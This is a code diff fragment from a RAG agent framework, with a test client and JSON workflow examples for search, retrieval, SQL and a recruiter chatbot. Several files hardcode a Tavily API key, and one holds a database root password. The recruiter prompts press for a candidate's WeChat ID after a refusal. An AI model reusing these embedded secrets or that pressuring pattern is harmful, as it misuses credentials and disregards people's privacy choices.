"avatar": "data:image/jpeg;base64,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"
}
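The template above is plain JSON to the agent runtime: the top-level "id", "title", "description", "canvas_type", and "avatar" fields are catalog metadata, while everything the executor walks lives under "dsl". A minimal sketch of inspecting that structure, with the file path taken from the diff header above (running a template end to end follows the pattern of agent/test/client.py later in this commit):

import json

# Load the template shown above and examine the wiring under "dsl".
with open("agent/templates/seo_blog.json") as f:
    template = json.load(f)

dsl = template["dsl"]  # components, graph, globals, history, messages, path, retrieval
print(dsl["components"]["begin"]["downstream"])  # -> ['Agent:ClearRabbitsScream']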
331 agent/templates/technical_docs.json Normal file
File diff suppressed because one or more lines are too long
331 agent/templates/technical_docs_qa.json Normal file
File diff suppressed because one or more lines are too long
685 agent/templates/trip_planner.json Normal file
File diff suppressed because one or more lines are too long
871 agent/templates/web_search_assistant.json Normal file
File diff suppressed because one or more lines are too long
46 agent/test/client.py Normal file
@@ -0,0 +1,46 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os

from agent.canvas import Canvas
from api import settings

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    dsl_default_path = os.path.join(
        os.path.dirname(os.path.realpath(__file__)),
        "dsl_examples",
        "retrieval_and_generate.json",
    )
    # A required argument can never fall back to its default, so -s is left
    # optional to make dsl_default_path reachable.
    parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=False)
    parser.add_argument('-t', '--tenant_id', default=False, help="Tenant ID", action='store', required=True)
    parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
    args = parser.parse_args()

    settings.init_settings()
    canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
    if canvas.get_prologue():
        print(f"==================== Bot =====================\n> {canvas.get_prologue()}", end='')
    while True:
        # Reset per-turn state, read the next user query, and stream the answer.
        canvas.reset(True)
        query = input("\n==================== User =====================\n> ")
        print("==================== Bot =====================\n> ", end='')
        # Run the canvas once per turn; the original called canvas.run() twice,
        # discarding the first result.
        for ans in canvas.run(query=query):
            print(ans, end='\n', flush=True)

    # Unreachable while the loop above runs forever; kept for debugging if the
    # loop is ever given an exit condition.
    print(canvas.path)
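Assuming the client is launched from the repository root so that the agent and api packages are importable, a typical interactive session starts like this (the tenant ID value is a placeholder):

python -m agent.test.client --dsl agent/test/dsl_examples/retrieval_and_generate.json --tenant_id <your_tenant_id>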
@@ -0,0 +1,85 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there!"
        }
      },
      "downstream": ["categorize:0"],
      "upstream": []
    },
    "categorize:0": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "product_related": {
              "description": "The question is about the product usage, appearance and how it works.",
              "to": ["agent:0"]
            },
            "others": {
              "description": "The question is not about the product usage, appearance and how it works.",
              "to": ["message:0"]
            }
          }
        }
      },
      "downstream": [],
      "upstream": ["begin"]
    },
    "message:0": {
      "obj": {
        "component_name": "Message",
        "params": {
          "content": ["Sorry, I don't know. I'm an AI bot."]
        }
      },
      "downstream": [],
      "upstream": ["categorize:0"]
    },
    "agent:0": {
      "obj": {
        "component_name": "Agent",
        "params": {
          "llm_id": "deepseek-chat",
          "sys_prompt": "You are a smart researcher. You could generate proper queries to search. According to the search results, you could decide the next query if the result is not enough.",
          "temperature": 0.2,
          "llm_enabled_tools": [
            {
              "component_name": "TavilySearch",
              "params": {
                "api_key": "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"
              }
            }
          ]
        }
      },
      "downstream": ["message:1"],
      "upstream": ["categorize:0"]
    },
    "message:1": {
      "obj": {
        "component_name": "Message",
        "params": {
          "content": ["{agent:0@content}"]
        }
      },
      "downstream": [],
      "upstream": ["agent:0"]
    }
  },
  "history": [],
  "path": [],
  "retrival": {"chunks": [], "doc_aggs": []},
  "globals": {
    "sys.query": "",
    "sys.user_id": "",
    "sys.conversation_turns": 0,
    "sys.files": []
  }
}
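The "{agent:0@content}" string in message:1 above is a variable reference: the component id before the @ selects a node, and the field after it selects one of that node's outputs. A minimal sketch of how such references can be expanded, assuming a simple dict of outputs rather than the real Canvas state (the actual resolver may differ):

import re

# Map of component id -> output fields, standing in for Canvas state.
outputs = {"agent:0": {"content": "Answer produced by the agent."}}

def resolve(text: str) -> str:
    # Replace each {component_id@field} with the matching output value.
    return re.sub(
        r"\{([^@{}]+)@([^{}]+)\}",
        lambda m: str(outputs[m.group(1)][m.group(2)]),
        text,
    )

print(resolve("{agent:0@content}"))  # -> Answer produced by the agent.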
43 agent/test/dsl_examples/exesql.json Normal file
@@ -0,0 +1,43 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "Hi there!"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["exesql:0"],
      "upstream": ["begin", "exesql:0"]
    },
    "exesql:0": {
      "obj": {
        "component_name": "ExeSQL",
        "params": {
          "database": "rag_flow",
          "username": "root",
          "host": "mysql",
          "port": 3306,
          "password": "infini_rag_flow",
          "top_n": 3
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["answer:0"]
    }
  },
  "history": [],
  "messages": [],
  "reference": {},
  "path": [],
  "answer": []
}
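The exesql:0 params above are ordinary MySQL connection settings pointing at a host named mysql. A sketch of the connection they describe, using PyMySQL purely for illustration (the ExeSQL component itself may use a different driver):

import pymysql

# Connect with the exact parameters from the DSL above.
conn = pymysql.connect(
    host="mysql",
    port=3306,
    user="root",
    password="infini_rag_flow",
    database="rag_flow",
)
with conn.cursor() as cur:
    cur.execute("SELECT 1")  # placeholder; ExeSQL runs generated SQL capped by top_n
    print(cur.fetchone())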
210 agent/test/dsl_examples/headhunter_zh.json Normal file
@@ -0,0 +1,210 @@
{
  "components": {
    "begin": {
      "obj": {
        "component_name": "Begin",
        "params": {
          "prologue": "您好!我是AGI方向的猎头,了解到您是这方面的大佬,然后冒昧的就联系到您。这边有个机会想和您分享,RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣?"
        }
      },
      "downstream": ["answer:0"],
      "upstream": []
    },
    "answer:0": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["categorize:0"],
      "upstream": ["begin", "message:reject"]
    },
    "categorize:0": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "about_job": {
              "description": "该问题关于职位本身或公司的信息。",
              "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
              "to": "retrieval:0"
            },
            "casual": {
              "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
              "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
              "to": "generate:casual"
            },
            "interested": {
              "description": "该回答表示他对于该职位感兴趣。",
              "examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
              "to": "message:introduction"
            },
            "answer": {
              "description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
              "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
              "to": "message:reject"
            }
          }
        }
      },
      "downstream": [
        "message:introduction",
        "generate:casual",
        "message:reject",
        "retrieval:0"
      ],
      "upstream": ["answer:0"]
    },
    "message:introduction": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的?"
          ]
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:0"]
    },
    "answer:1": {
      "obj": {
        "component_name": "Answer",
        "params": {}
      },
      "downstream": ["categorize:1"],
      "upstream": [
        "message:introduction",
        "generate:aboutJob",
        "generate:casual",
        "generate:get_wechat",
        "generate:nowechat"
      ]
    },
    "categorize:1": {
      "obj": {
        "component_name": "Categorize",
        "params": {
          "llm_id": "deepseek-chat",
          "category_description": {
            "about_job": {
              "description": "该问题关于职位本身或公司的信息。",
              "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
              "to": "retrieval:0"
            },
            "casual": {
              "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
              "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
              "to": "generate:casual"
            },
            "wechat": {
              "description": "该回答表示他愿意加微信,或者已经报了微信号。",
              "examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
              "to": "generate:get_wechat"
            },
            "giveup": {
              "description": "该回答表示他不愿意加微信。",
              "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
              "to": "generate:nowechat"
            }
          },
          "message_history_window_size": 8
        }
      },
      "downstream": [
        "retrieval:0",
        "generate:casual",
        "generate:get_wechat",
        "generate:nowechat"
      ],
      "upstream": ["answer:1"]
    },
    "generate:casual": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头,现在候选人的聊了和职位无关的话题,请耐心的回应候选人,并将话题往该AGI的职位上带,最好能要到候选人微信号以便后面保持联系。",
          "temperature": 0.9,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:0", "categorize:1"]
    },
    "retrieval:0": {
      "obj": {
        "component_name": "Retrieval",
        "params": {
          "similarity_threshold": 0.2,
          "keywords_similarity_weight": 0.3,
          "top_n": 6,
          "top_k": 1024,
          "rerank_id": "BAAI/bge-reranker-v2-m3",
          "kb_ids": ["869a236818b811ef91dffa163e197198"]
        }
      },
      "downstream": ["generate:aboutJob"],
      "upstream": ["categorize:0", "categorize:1"]
    },
    "generate:aboutJob": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头,候选人问了有关职位或公司的问题,你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号,如:\n - 方便加一下微信吗,我把JD发您看看?\n - 微信号多少,我把详细职位JD发您?\n 职位信息如下:\n {input}\n 职位信息如上。",
          "temperature": 0.02
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["retrieval:0"]
    },
    "generate:get_wechat": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头,候选人表示不反感加微信,如果对方已经报了微信号,表示感谢和信任并表示马上会加上;如果没有,则问对方微信号多少。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
          "temperature": 0.1,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:1"]
    },
    "generate:nowechat": {
      "obj": {
        "component_name": "Generate",
        "params": {
          "llm_id": "deepseek-chat",
          "prompt": "你是AGI方向的猎头,当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人,表示对于保护隐私信息给予理解,也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
          "temperature": 0.1,
          "message_history_window_size": 12,
          "cite": false
        }
      },
      "downstream": ["answer:1"],
      "upstream": ["categorize:1"]
    },
    "message:reject": {
      "obj": {
        "component_name": "Message",
        "params": {
          "messages": [
            "好的,祝您生活愉快,工作顺利。",
            "哦,好的,感谢您宝贵的时间!"
          ]
        }
      },
      "downstream": ["answer:0"],
      "upstream": ["categorize:0"]
    }
|
||||||
|
},
|
||||||
|
"history": [],
|
||||||
|
"messages": [],
|
||||||
|
"path": [],
|
||||||
|
"reference": [],
|
||||||
|
"answer": []
|
||||||
|
}
|
||||||
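Each DSL example above and below is a directed graph: every component names its "downstream" and "upstream" neighbors, and execution starts at "begin". The following is a minimal sketch of walking such a graph, written in plain Python over the JSON structure shown here; it is not RAGFlow's actual scheduler, and it ignores the fact that branching components such as Categorize select a single downstream at runtime.

import json

def walk(dsl_path: str) -> list[str]:
    # Breadth-first walk from "begin" along "downstream" edges; the seen-set
    # guards against the cycles these examples contain (e.g. reject -> answer:0).
    with open(dsl_path, encoding="utf-8") as f:
        components = json.load(f)["components"]
    order, queue, seen = [], ["begin"], set()
    while queue:
        cpn_id = queue.pop(0)
        if cpn_id in seen:
            continue
        seen.add(cpn_id)
        order.append(f"{cpn_id} ({components[cpn_id]['obj']['component_name']})")
        queue.extend(components[cpn_id].get("downstream", []))
    return order

print(walk("agent/test/dsl_examples/headhunter_zh.json"))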
92
agent/test/dsl_examples/iteration.json
Normal file
@@ -0,0 +1,92 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["generate:0"],
            "upstream": []
        },
        "generate:0": {
            "obj": {
                "component_name": "Agent",
                "params": {
                    "llm_id": "deepseek-chat",
                    "sys_prompt": "You are a helpful research assistant. \nPlease decompose user's topic: '{sys.query}' into several meaningful sub-topics. \nThe output format MUST be a string array like: [\"sub-topic1\", \"sub-topic2\", ...]. Redundant information is forbidden.",
                    "temperature": 0.2,
                    "cite": false,
                    "output_structure": ["sub-topic1", "sub-topic2", "sub-topic3"]
                }
            },
            "downstream": ["iteration:0"],
            "upstream": ["begin"]
        },
        "iteration:0": {
            "obj": {
                "component_name": "Iteration",
                "params": {
                    "items_ref": "generate:0@structured_content"
                }
            },
            "downstream": ["message:0"],
            "upstream": ["generate:0"]
        },
        "iterationitem:0": {
            "obj": {
                "component_name": "IterationItem",
                "params": {}
            },
            "parent_id": "iteration:0",
            "downstream": ["tavily:0"],
            "upstream": []
        },
        "tavily:0": {
            "obj": {
                "component_name": "TavilySearch",
                "params": {
                    "api_key": "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",
                    "query": "iterationitem:0@result"
                }
            },
            "parent_id": "iteration:0",
            "downstream": ["generate:1"],
            "upstream": ["iterationitem:0"]
        },
        "generate:1": {
            "obj": {
                "component_name": "Agent",
                "params": {
                    "llm_id": "deepseek-chat",
                    "sys_prompt": "Your goal is to provide answers based on information from the internet. \nYou must use the provided search results to find relevant online information. \nYou should never use your own knowledge to answer questions.\nPlease include relevant url sources in the end of your answers.\n\n \"{tavily:0@formalized_content}\" \nUsing the above information, answer the following question or topic: \"{iterationitem:0@result} \"\nin a detailed report — The report should focus on the answer to the question, should be well structured, informative, in depth, with facts and numbers if available, a minimum of 200 words and with markdown syntax and apa format. Write all source urls at the end of the report in apa format. You should write your report only based on the given information and nothing else.",
                    "temperature": 0.9,
                    "cite": false
                }
            },
            "parent_id": "iteration:0",
            "downstream": ["iterationitem:0"],
            "upstream": ["tavily:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "content": ["{iteration:0@generate:1}"]
                }
            },
            "downstream": [],
            "upstream": ["iteration:0"]
        }
    },
    "history": [],
    "path": [],
    "retrival": {"chunks": [], "doc_aggs": []},
    "globals": {
        "sys.query": "",
        "sys.user_id": "",
        "sys.conversation_turns": 0,
        "sys.files": []
    }
}
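The Iteration/IterationItem pair above forms a loop: "items_ref" points at the array produced by generate:0, iterationitem:0 yields one element per pass as its @result, the inner chain (tavily:0 then generate:1) runs once per element, and the collected output is read downstream as {iteration:0@generate:1}. A rough sketch of those semantics in plain Python (hypothetical stand-in functions, not RAGFlow's executor):

def search(topic: str) -> str:
    # Stands in for tavily:0; query is the current item.
    return f"search results for {topic!r}"

def report(topic: str, hits: str) -> str:
    # Stands in for generate:1; one report per item.
    return f"report on {topic!r} based on: {hits}"

def run_iteration(items: list[str]) -> list[str]:
    # Each pass plays the role of iterationitem:0 yielding one @result;
    # the collected list is what downstream reads as {iteration:0@generate:1}.
    return [report(item, search(item)) for item in items]

print(run_iteration(["sub-topic1", "sub-topic2"]))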
61
agent/test/dsl_examples/retrieval_and_generate.json
Normal file
@@ -0,0 +1,61 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["retrieval:0"],
            "upstream": []
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "",
                    "empty_response": "Nothing found in dataset",
                    "kb_ids": ["1a3d1d7afb0611ef9866047c16ec874f"]
                }
            },
            "downstream": ["generate:0"],
            "upstream": ["begin"]
        },
        "generate:0": {
            "obj": {
                "component_name": "LLM",
                "params": {
                    "llm_id": "deepseek-chat",
                    "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["message:0"],
            "upstream": ["retrieval:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "content": ["{generate:0@content}"]
                }
            },
            "downstream": [],
            "upstream": ["generate:0"]
        }
    },
    "history": [],
    "path": [],
    "retrival": {"chunks": [], "doc_aggs": []},
    "globals": {
        "sys.query": "",
        "sys.user_id": "",
        "sys.conversation_turns": 0,
        "sys.files": []
    }
}
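Strings such as {retrieval:0@formalized_content} and {generate:0@content} are variable references: component_id@output_name, resolved against a component's outputs at runtime. A minimal sketch of that substitution, with semantics inferred from these examples rather than taken from RAGFlow's resolver:

import re

def resolve(template: str, outputs: dict[str, dict[str, str]]) -> str:
    # Replace "{component_id@output}" placeholders with values from a table
    # of component outputs, e.g. outputs["generate:0"]["content"].
    def sub(m: re.Match) -> str:
        cpn_id, out_name = m.group(1), m.group(2)
        return outputs.get(cpn_id, {}).get(out_name, "")
    return re.sub(r"\{([a-z]+:\d+)@([\w:]+)\}", sub, template)

outputs = {"generate:0": {"content": "Answer from the LLM."}}
print(resolve("{generate:0@content}", outputs))  # -> Answer from the LLM.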
@@ -0,0 +1,95 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["categorize:0"],
            "upstream": []
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": [],
                            "to": ["retrieval:0"]
                        },
                        "others": {
                            "description": "The question is not about the product usage, appearance and how it works.",
                            "examples": [],
                            "to": ["message:0"]
                        }
                    }
                }
            },
            "downstream": [],
            "upstream": ["begin"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "content": [
                        "Sorry, I don't know. I'm an AI bot."
                    ]
                }
            },
            "downstream": [],
            "upstream": ["categorize:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "",
                    "empty_response": "Nothing found in dataset",
                    "kb_ids": ["1a3d1d7afb0611ef9866047c16ec874f"]
                }
            },
            "downstream": ["generate:0"],
            "upstream": ["categorize:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Agent",
                "params": {
                    "llm_id": "deepseek-chat",
                    "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {retrieval:0@formalized_content}\n The above is the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["message:1"],
            "upstream": ["retrieval:0"]
        },
        "message:1": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "content": ["{generate:0@content}"]
                }
            },
            "downstream": [],
            "upstream": ["generate:0"]
        }
    },
    "history": [],
    "path": [],
    "retrival": {"chunks": [], "doc_aggs": []},
    "globals": {
        "sys.query": "",
        "sys.user_id": "",
        "sys.conversation_turns": 0,
        "sys.files": []
    }
}
55
agent/test/dsl_examples/tavily_and_generate.json
Normal file
@@ -0,0 +1,55 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["tavily:0"],
            "upstream": []
        },
        "tavily:0": {
            "obj": {
                "component_name": "TavilySearch",
                "params": {
                    "api_key": "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"
                }
            },
            "downstream": ["generate:0"],
            "upstream": ["begin"]
        },
        "generate:0": {
            "obj": {
                "component_name": "LLM",
                "params": {
                    "llm_id": "deepseek-chat",
                    "sys_prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {tavily:0@formalized_content}\n The above is the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["message:0"],
            "upstream": ["tavily:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "content": ["{generate:0@content}"]
                }
            },
            "downstream": [],
            "upstream": ["generate:0"]
        }
    },
    "history": [],
    "path": [],
    "retrival": {"chunks": [], "doc_aggs": []},
    "globals": {
        "sys.query": "",
        "sys.user_id": "",
        "sys.conversation_turns": 0,
        "sys.files": []
    }
}
48
agent/tools/__init__.py
Normal file
@@ -0,0 +1,48 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
